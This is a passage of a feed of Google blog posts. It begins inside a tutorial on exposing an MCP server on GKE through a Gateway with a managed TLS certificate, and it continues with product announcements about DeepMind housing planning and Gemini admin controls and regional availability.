&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now let's secure the connection. To do so, we'll use a Google-managed SSL certificate and attach it to a Gateway API resource. First, reserve a static IP address for your load balancer:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud compute addresses create mcp-server-ip --global\r\nexport MCP_SERVER_IP=$(gcloud compute addresses describe mcp-server-ip --global --format=&amp;quot;value(address)&amp;quot;)\r\necho &amp;quot;Your IP: $MCP_SERVER_IP&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092e2e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Point your domain's DNS &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;A&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; record at &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;$MCP_SERVER_IP&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. Example: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp.yourdomain.com&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Create a Google-Managed Certificate. Replace &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp.yourdomain.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with your actual domain.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud compute ssl-certificates create mcp-cert --domains mcp.yourdomain.com --global&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092e970&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gateway.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file to provision the load balancer and configure Transport Layer Security (TLS) termination.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Gateway: HTTPS load balancer with the managed certificate and static IP\r\napiVersion: gateway.networking.k8s.io/v1beta1\r\nkind: Gateway\r\nmetadata:\r\n  name: mcp-gateway\r\nspec:\r\n  gatewayClassName: gke-l7-global-external-managed\r\n  listeners:\r\n  - name: https\r\n    protocol: HTTPS\r\n    port: 443\r\n    tls:\r\n      mode: Terminate\r\n      options:\r\n        networking.gke.io/pre-shared-certs: mcp-cert\r\n  addresses:\r\n  - type: NamedAddress\r\n    value: mcp-server-ip\r\n---\r\n# HTTPRoute: forward traffic to the MCP Server\r\napiVersion: gateway.networking.k8s.io/v1\r\nkind: HTTPRoute\r\nmetadata:\r\n  name: mcp-route\r\nspec:\r\n  parentRefs:\r\n  - name: mcp-gateway\r\n  hostnames:\r\n  - &amp;quot;mcp.yourdomain.com&amp;quot;\r\n  rules:\r\n  - matches:\r\n    - path:\r\n        type: PathPrefix\r\n        value: /mcp\r\n    backendRefs:\r\n    - name: mcp-service\r\n      port: 80\r\n---\r\n# The GCPBackendPolicy is used to configure session affinity and other backend.\r\n# Since MCP Servers are stateful we enable session affinity. This ensures that\r\n# requests from the same client are sent to the same backend.\r\napiVersion: networking.gke.io/v1\r\nkind: GCPBackendPolicy\r\nmetadata:\r\n  name: mcp-backend-policy\r\nspec:\r\n  default:\r\n    sessionAffinity:\r\n      type: CLIENT_IP\r\n  targetRef:\r\n    group: &amp;quot;&amp;quot;\r\n    kind: Service\r\n    name: mcp-service\r\n---\r\n# The HealthCheckPolicy is used to configure custom health probes for the MCP Server.\r\napiVersion: networking.gke.io/v1\r\nkind: HealthCheckPolicy\r\nmetadata:\r\n  name: mcp-health\r\n  namespace: default\r\nspec:\r\n  default:\r\n    checkIntervalSec: 15\r\n    timeoutSec: 5\r\n    healthyThreshold: 1\r\n    unhealthyThreshold: 2\r\n    logConfig:\r\n      enabled: false\r\n    config:\r\n      type: HTTP\r\n      httpHealthCheck:\r\n        port: 3000\r\n        requestPath: /healthz\r\n  targetRef:\r\n    group: &amp;quot;&amp;quot;\r\n    kind: Service\r\n    name: mcp-service&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092ef70&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deploying this configuration creates the infrastructure required to route external traffic securely to the MCP server.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl apply -f gateway.yaml&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092e310&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Wait a few minutes for the load balancer to become active and the certificate to provision. Developers can check the status using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;kubectl get gateway mcp-gateway&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Try to reach the remote MCP Server. Run the test script to verify the connection. make sure to edit the MCP Server URL in the test script to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;https://mcp.yourdomain.com/mcp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv run test_mcp_server.py&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092ed60&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Cleanup&lt;/h2&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl delete -f deployment.yaml\r\nkubectl delete -f gateway.yaml\r\ngcloud compute addresses delete mcp-server-ip --global\r\ngcloud compute ssl-certificates delete mcp-cert --global\r\ngcloud artifacts repositories delete mcp-repo --location=$REGION\r\ngcloud container clusters delete mcp-cluster --region $REGION&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092e4c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Continue reading&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deploying Model Context Protocol servers to Kubernetes enables new use cases for integrated agents and AI workflows. To dive deeper into these capabilities, explore the following resources:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://modelcontextprotocol.io/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Context Protocol documentation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/gateway-api" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE Gateway API documentation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/jlowin/fastmcp" rel="noopener" target="_blank"&gt;FastMCP Repository&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/build-and-deploy-a-remote-mcp-server-to-gke-in-30-minutes/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-17T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/unlocking-uk-house-building-with-ai-accelerated-planning</id>
    <title>Unlocking UK house-building with AI-accelerated planning</title>
    <updated>2026-06-16T21:29:50+00:00</updated>
    <content type="html">UK government partners with Google DeepMind to build a new AI-powered prototype aimed at faster housing decisions.</content>
    <link href="https://deepmind.google/blog/unlocking-uk-house-building-with-ai-accelerated-planning" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-06-16T21:29:50+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/unlocking-uk-house-building-with-ai-accelerated-planning/</id>
    <title>Unlocking UK house-building with AI-accelerated planning</title>
    <updated>2026-06-16T21:29:50+00:00</updated>
    <content type="html">UK government partners with Google DeepMind to build a new AI-powered prototype aimed at faster housing decisions.</content>
    <link href="https://deepmind.google/blog/unlocking-uk-house-building-with-ai-accelerated-planning/" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-06-16T21:29:50+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/temporary-chats-and-conversation-deletion-control-for-gemini.html</id>
    <title>Control whether your users can have temporary chats and delete conversations in the Gemini app</title>
    <updated>2026-06-16T21:02:46+00:00</updated>
    <content type="html">We’re introducing two new administrator controls for the Gemini app (gemini.google.com) that allow end users to manage their own chat activity. Admins can now configure whether users can use &lt;b&gt;temporary chats&lt;/b&gt; and &lt;b&gt;delete their conversation history&lt;/b&gt;.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Temporary chats&lt;/b&gt; allows users to have conversations that are not saved to their history.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Conversation deletion&lt;/b&gt; allows users to delete individual chats or their entire chat history.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;These settings give organizations greater flexibility in managing data while empowering users to control their Gemini app experience.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Please note: If your organization uses Google Vault, &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-vault-now-supports-retention-rules-and-litigation-holds-for-Gemini-app.html" target="_blank"&gt;Vault retention rules&lt;/a&gt; will always be honored if they are set up.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;These features will be ON by default and can be disabled at the domain, OU, or group level. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/p/temp-chats" target="_blank"&gt;learn more&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; If enabled by your administrator, you can &lt;a href="https://support.google.com/gemini/answer/13275745?hl=en&amp;amp;co=GENIE.Platform%3DAndroid&amp;amp;sjid=15095925293388133547-NC#:~:text=a%20Google%20Account.-,Start%20a%20temporary%20chat,-You%20can%20start" target="_blank"&gt;start a temporary chat&lt;/a&gt; or &lt;a href="https://support.google.com/gemini/answer/13666746?hl=en&amp;amp;co=GENIE.Platform%3DAndroid#zippy=%2Cin-the-gemini-mobile-app:~:text=Delete%20a%20chat%20from%20pinned%20%26%20recent%20chats" target="_blank"&gt;delete a chat&lt;/a&gt; directly within the Gemini app interface.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;b&gt;Admin controls&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Full rollout (5-7 days for feature visibility) started on June 15, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;End-user visibility&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Full rollout (5-7 days for feature visibility) starting on June 21, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/p/temp-chats" target="_blank"&gt;Enable Gemini temporary chats in the Gemini App&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Gemini Apps Help: &lt;a href="https://support.google.com/gemini/answer/13275745?hl=en&amp;amp;co=GENIE.Platform%3DAndroid&amp;amp;sjid=15095925293388133547-NC#:~:text=a%20Google%20Account.-,Start%20a%20temporary%20chat,-You%20can%20start" target="_blank"&gt;Start a temporary chat&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Gemini Apps Help: &lt;a href="https://support.google.com/gemini/answer/13666746?hl=en&amp;amp;co=GENIE.Platform%3DAndroid#zippy=%2Cin-the-gemini-mobile-app:~:text=Delete%20a%20chat%20from%20pinned%20%26%20recent%20chats" target="_blank"&gt;Delete a chat from pinned &amp;amp; recent chats&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-vault-now-supports-retention-rules-and-litigation-holds-for-Gemini-app.html" target="_blank"&gt;Google Vault now supports retention rules and litigation holds for Gemini app&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/temporary-chats-and-conversation-deletion-control-for-gemini.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-16T21:02:46+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/temporary-chats-and-conversation-deletion-control-for-gemini.html</id>
    <title>Control whether your users can have temporary chats and delete conversations in the Gemini app</title>
    <updated>2026-06-16T21:02:46+00:00</updated>
    <content type="html">We’re introducing two new administrator controls for the Gemini app (gemini.google.com) that allow end users to manage their own chat activity. Admins can now configure whether users can use &lt;b&gt;temporary chats&lt;/b&gt; and &lt;b&gt;delete their conversation history&lt;/b&gt;.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Temporary chats&lt;/b&gt; allows users to have conversations that are not saved to their history.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Conversation deletion&lt;/b&gt; allows users to delete individual chats or their entire chat history.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;These settings give organizations greater flexibility in managing data while empowering users to control their Gemini app experience.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Please note: If your organization uses Google Vault, &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-vault-now-supports-retention-rules-and-litigation-holds-for-Gemini-app.html" target="_blank"&gt;Vault retention rules&lt;/a&gt; will always be honored if they are set up.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;These features will be ON by default and can be disabled at the domain, OU, or group level. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/p/temp-chats" target="_blank"&gt;learn more&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; If enabled by your administrator, you can &lt;a href="https://support.google.com/gemini/answer/13275745?hl=en&amp;amp;co=GENIE.Platform%3DAndroid&amp;amp;sjid=15095925293388133547-NC#:~:text=a%20Google%20Account.-,Start%20a%20temporary%20chat,-You%20can%20start" target="_blank"&gt;start a temporary chat&lt;/a&gt; or &lt;a href="https://support.google.com/gemini/answer/13666746?hl=en&amp;amp;co=GENIE.Platform%3DAndroid#zippy=%2Cin-the-gemini-mobile-app:~:text=Delete%20a%20chat%20from%20pinned%20%26%20recent%20chats" target="_blank"&gt;delete a chat&lt;/a&gt; directly within the Gemini app interface.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;b&gt;Admin controls&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Full rollout (5-7 days for feature visibility) started on June 15, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;End-user visibility&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Full rollout (5-7 days for feature visibility) starting on June 21, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/p/temp-chats" target="_blank"&gt;Enable Gemini temporary chats in the Gemini App&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Gemini Apps Help: &lt;a href="https://support.google.com/gemini/answer/13275745?hl=en&amp;amp;co=GENIE.Platform%3DAndroid&amp;amp;sjid=15095925293388133547-NC#:~:text=a%20Google%20Account.-,Start%20a%20temporary%20chat,-You%20can%20start" target="_blank"&gt;Start a temporary chat&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Gemini Apps Help: &lt;a href="https://support.google.com/gemini/answer/13666746?hl=en&amp;amp;co=GENIE.Platform%3DAndroid#zippy=%2Cin-the-gemini-mobile-app:~:text=Delete%20a%20chat%20from%20pinned%20%26%20recent%20chats" target="_blank"&gt;Delete a chat from pinned &amp;amp; recent chats&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-vault-now-supports-retention-rules-and-litigation-holds-for-Gemini-app.html" target="_blank"&gt;Google Vault now supports retention rules and litigation holds for Gemini app&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/temporary-chats-and-conversation-deletion-control-for-gemini.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-16T21:02:46+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/expanded-availability-gemini-in-chrome.html</id>
    <title>Gemini in Chrome expands to more languages and regions, including Latin America, Africa, and the Middle East</title>
    <updated>2026-06-16T19:16:38+00:00</updated>
    <content type="html">Many of &lt;a href="https://blog.google/products-and-platforms/products/chrome/gemini-3-auto-browse/" target="_blank"&gt;Chrome's latest AI features&lt;/a&gt; are rolling out to users in Latin America, Africa, the Middle East, &lt;a href="https://support.google.com/chrome/a/answer/16291696?hl=en&amp;amp;ref_topic=14443801&amp;amp;sjid=5538708151884396850-NA#zippy=:~:text=of%20supported%20languages.-,Supported%20regions,-Supported%20languages" target="_blank"&gt;and more&lt;/a&gt;.&amp;nbsp;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicNZhGhwaKBErbZgD81s7qEXC-yya8_jKSDBgHthVT9s1z4SHfB-mvi7Uvs6ENbRZ20lUne0d20KnoBgt4IWnVuuYrsDUJxkhjdrW__M4NYnLUPDLvijqhmKbEUv19jxaoJAjtqiAXNpzdTuKr5X2kTENFWZTBZFfPXDUXbKvlemYKHd69myKIc3lECmeF/s1612/Gemini%20in%20Chrome_Side-Panel.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="GIF showing Gemini in Chrome side panel" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicNZhGhwaKBErbZgD81s7qEXC-yya8_jKSDBgHthVT9s1z4SHfB-mvi7Uvs6ENbRZ20lUne0d20KnoBgt4IWnVuuYrsDUJxkhjdrW__M4NYnLUPDLvijqhmKbEUv19jxaoJAjtqiAXNpzdTuKr5X2kTENFWZTBZFfPXDUXbKvlemYKHd69myKIc3lECmeF/s16000/Gemini%20in%20Chrome_Side-Panel.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Gemini in Chrome empowers business and education users with AI tools that integrate seamlessly into their daily browsing workflows while maintaining &lt;a href="https://support.google.com/a?p=gemini_in_chrome" target="_blank"&gt;strict data governance&lt;/a&gt;. It’s also available to users with personal Google accounts who can access the Gemini app.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Gemini in Chrome allows users to:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Get answers and insights: &lt;/b&gt;Summarize articles, clarify complex concepts, or find specific information based on the context of open tabs.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Generate content:&lt;/b&gt; Draft emails and social media posts, or create images directly in the browser.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Go live: &lt;/b&gt;Engage in two-way voice conversations with Gemini Live to brainstorm ideas or prepare for meetings.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature is ON by default unless you’ve already disabled the &lt;a href="https://support.google.com/a?p=gemini_in_chrome" target="_blank"&gt;Gemini app service setting&lt;/a&gt; or the &lt;a href="https://chromeenterprise.google/policies/#GeminiSettings" target="_blank"&gt;Chrome Gemini setting&lt;/a&gt;. The feature can be turned on or off at the domain, OU, or group level. Refer to the &lt;a href="https://support.google.com/a/answer/14571493" target="_blank"&gt;Help Center&lt;/a&gt; or our &lt;a href="http://workspaceupdates.googleblog.com/2025/09/gemini-in-google-chrome-admin-settings-available.html" target="_blank"&gt;previous announcement&lt;/a&gt; for information on the terms of service and privacy considerations for the feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;To access Gemini in Chrome, click the Gemini icon at the top of your browser. You must meet the criteria listed &lt;a href="https://support.google.com/a/answer/14571493" target="_blank"&gt;here&lt;/a&gt;. Learn more about using Gemini in Chrome &lt;a href="https://support.google.com/chrome/a/answer/17034491?visit_id=639124760733849519-596500748&amp;amp;p=gemini_in_chrome_learning_center&amp;amp;rd=2&amp;amp;ref_topic=17031489" target="_blank"&gt;here&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Extended rollout (potentially longer than 15 days for feature visibility) started on June 10, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace plans, Workspace Individual subscribers, and users with personal Google accounts on ChromeOS, MacOS and Windows devices&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;Chrome Enterprise &amp;amp; Education Help: &lt;a href="https://support.google.com/chrome/a/answer/16291696" target="_blank"&gt;Gemini in Chrome&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2025/10/use-gemini-in-chrome-ai-browsing-assistant.html" target="_blank"&gt;Use the Gemini in Chrome AI browsing assistant, now generally available&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/14571493" target="_blank"&gt;Turn the Gemini app on or off&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/14564320?hl=en&amp;amp;ref_topic=15995054&amp;amp;sjid=18281381205986296685-NA" target="_blank"&gt;Review Gemini usage in your organization&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/15706919" target="_blank"&gt;Generative AI in Google Workspace Privacy Hub&lt;/a&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/expanded-availability-gemini-in-chrome.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-16T19:16:38+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/expanded-availability-gemini-in-chrome.html</id>
    <title>Gemini in Chrome expands to more languages and regions, including Latin America, Africa, and the Middle East</title>
    <updated>2026-06-16T19:16:38+00:00</updated>
    <content type="html">Many of &lt;a href="https://blog.google/products-and-platforms/products/chrome/gemini-3-auto-browse/" target="_blank"&gt;Chrome's latest AI features&lt;/a&gt; are rolling out to users in Latin America, Africa, the Middle East, &lt;a href="https://support.google.com/chrome/a/answer/16291696?hl=en&amp;amp;ref_topic=14443801&amp;amp;sjid=5538708151884396850-NA#zippy=:~:text=of%20supported%20languages.-,Supported%20regions,-Supported%20languages" target="_blank"&gt;and more&lt;/a&gt;.&amp;nbsp;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicNZhGhwaKBErbZgD81s7qEXC-yya8_jKSDBgHthVT9s1z4SHfB-mvi7Uvs6ENbRZ20lUne0d20KnoBgt4IWnVuuYrsDUJxkhjdrW__M4NYnLUPDLvijqhmKbEUv19jxaoJAjtqiAXNpzdTuKr5X2kTENFWZTBZFfPXDUXbKvlemYKHd69myKIc3lECmeF/s1612/Gemini%20in%20Chrome_Side-Panel.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="GIF showing Gemini in Chrome side panel" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicNZhGhwaKBErbZgD81s7qEXC-yya8_jKSDBgHthVT9s1z4SHfB-mvi7Uvs6ENbRZ20lUne0d20KnoBgt4IWnVuuYrsDUJxkhjdrW__M4NYnLUPDLvijqhmKbEUv19jxaoJAjtqiAXNpzdTuKr5X2kTENFWZTBZFfPXDUXbKvlemYKHd69myKIc3lECmeF/s16000/Gemini%20in%20Chrome_Side-Panel.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Gemini in Chrome empowers business and education users with AI tools that integrate seamlessly into their daily browsing workflows while maintaining &lt;a href="https://support.google.com/a?p=gemini_in_chrome" target="_blank"&gt;strict data governance&lt;/a&gt;. It’s also available to users with personal Google accounts who can access the Gemini app.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Gemini in Chrome allows users 